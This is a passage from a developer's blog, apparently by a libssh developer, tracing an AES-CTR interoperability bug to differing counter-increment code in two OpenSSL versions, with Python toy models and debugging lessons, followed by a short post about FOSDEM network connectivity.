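    return hashlib.sha256(key + block).digest()[:BLOCK]

def increment(counter):
    # Treat the 16-byte counter as a big-endian integer and add 1.
    value = (int.from_bytes(counter, "big") + 1) % (1 << 128)
    return value.to_bytes(BLOCK, "big")

def ctr_crypt(key, iv, data):
    """Encrypts or decrypts: the data is XORed with E(key, counter) blocks."""
    counter = iv
    out = bytearray()
    for i in range(0, len(data), BLOCK):
        keystream = block_encrypt(key, counter)
        chunk = data[i:i + BLOCK]
        out.extend(a ^ b for a, b in zip(chunk, keystream))
        counter = increment(counter)
    return bytes(out)

key = b"k" * 16
iv = bytes(16)
plaintext = b"thirty-two bytes of SSH payload!"
ciphertext = ctr_crypt(key, iv, plaintext)
roundtrip = ctr_crypt(key, iv, ciphertext)
print(roundtrip == plaintext)
```

Note that the block cipher is only ever applied to the counter, never to the data, which is why both peers must agree exactly on how the counter evolves from one block to the next.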

So now, how come libssh with OpenSSL 0.9.8 on my desktop talking to OpenSSH on RHEL 4.8 works like a charm, while libssh with OpenSSL 0.9.7a on RHEL/CentOS 4.8 does not ?

I had to go one step further and look what could be wrong in the way I am using the AES_ctr128_encrypt function. I looked at the code of OpenSSL 0.9.8 and found this:

/* increment counter (128-bit int) by 1 */
static void AES_ctr128_inc(unsigned char *counter) {
  unsigned long c;

  /* Grab bottom dword of counter and increment */
  c = GETU32(counter + 12);
  c++; c &= 0xFFFFFFFF;
  [...]

This is the code used to increment the counter. And now the surprise in the sources of OpenSSL 0.9.7a :

/* increment counter (128-bit int) by 2^64 */
static void AES_ctr128_inc(unsigned char *counter) {
  unsigned long c;

  /* Grab 3rd dword of counter and increment */
#ifdef L_ENDIAN
  c = GETU32(counter + 8);
  [...]

What does that mean ? It means that the counter increment is not the same between the two versions of AES-CTR128 ! Both versions start from the same initial counter, which explains why the first block was always correct and everything after it was garbage. OpenSSL ships either a broken or a correct implementation of AES-CTR128, depending on the version. The CVS commit fixing this dates back to 2003, and I found that OpenSSL 0.9.7c fixes the issue. Of course, no documentation explains that difference and nothing in the header files lets you know whether you’re facing a broken or a working implementation (I would have expected a #define in the working version).
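
The effect can be reproduced with a toy model in Python. Both increment functions below are simplified guesses based on the truncated excerpts (one bumps the whole 128-bit big-endian counter, the other bumps the 32-bit word at byte offset 8 and ignores carries), and `block_encrypt` is a keyed hash standing in for AES, so this only illustrates the symptom, not the exact OpenSSL behaviour.

```python
import hashlib

BLOCK = 16

def block_encrypt(key, block):
    # Stand-in for AES, for illustration only.
    return hashlib.sha256(key + block).digest()[:BLOCK]

def inc_whole_counter(counter):
    # Model of the fixed version: add 1 to the 128-bit big-endian integer.
    value = (int.from_bytes(counter, "big") + 1) % (1 << 128)
    return value.to_bytes(BLOCK, "big")

def inc_word_at_offset_8(counter):
    # Model of the older version: bump the dword at offset 8 (no carry).
    word = (int.from_bytes(counter[8:12], "big") + 1) & 0xFFFFFFFF
    return counter[:8] + word.to_bytes(4, "big") + counter[12:]

def keystream_blocks(key, iv, count, increment):
    counter, blocks = iv, []
    for _ in range(count):
        blocks.append(block_encrypt(key, counter))
        counter = increment(counter)
    return blocks

key = b"k" * 16
iv = bytes(range(16))
fixed = keystream_blocks(key, iv, 3, inc_whole_counter)
older = keystream_blocks(key, iv, 3, inc_word_at_offset_8)
same_block = [a == b for a, b in zip(fixed, older)]
print(same_block)
```

Only the first keystream block matches, because it is derived from the untouched IV. That is the pattern seen in the debug output: a valid first block (hence a sane packet size) followed by garbage and a MAC failure.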

By studying the sources of OpenSSH, I found that they were not affected by the bug because they implemented CTR mode on their own. Not wanting to do this, I simply disabled the compilation of the CTR algorithms in libssh when building against a broken OpenSSL. Yep, “Fixed!”.

Lessons learned

These things are important when you’re debugging cryptographic code that produces garbage:

  • Verify the input. Garbage in, garbage out.
  • Verify the derived inputs, like the IV. Even a single wrong bit can turn the output into garbage.
  • Verify the output. It’s possible that the output of the cryptographic algorithm you’re using is good, and it’s just not what the other party is reading and trying to decrypt …
  • Verify that you’re using the crypto correctly. When the only doc you have is the header file, as with libcrypto, then read the source.
  • If none of this worked… read the source of the crypto and find the difference between the working implementation and the broken one. Maybe it’s something you did not understand and used wrongly, maybe …

My new blog

Hi there !

After some solicitation from third parties (read: libssh developers), I finally installed a real blog to replace more or less my wiki-based website. I’m going to discuss some things about libssh development, thoughts about programming, networks, computer security and internet.

I’ll take the occasion to tell you about the FOSDEM convention that took place this weekend. An awesome meeting of open source developers, it was a great occasion to meet people, in particular Andreas, who is a libssh developer as well. It’s also interesting to note that this is the first time FOSDEM was connected to the IP world through BELNET (note: I work for BELNET). FOSDEM was connected to BELNET over IPv4 and IPv6 using fiber, and this bandwidth was distributed to users through WiFi access points spread across the ULB campus. The bandwidth used peaked around 100 Mbit/s (a poor 1/10th of the available bandwidth) due to the technical limitations of the airwaves, but I’m sure the tech staff will find a solution for next year. Also interesting to note: an IPv4 address was available for each participant (two /19 were allocated) and the IPv6/IPv4 enabled ratio was around 90%.

I’m looking forward to more good stuff next year !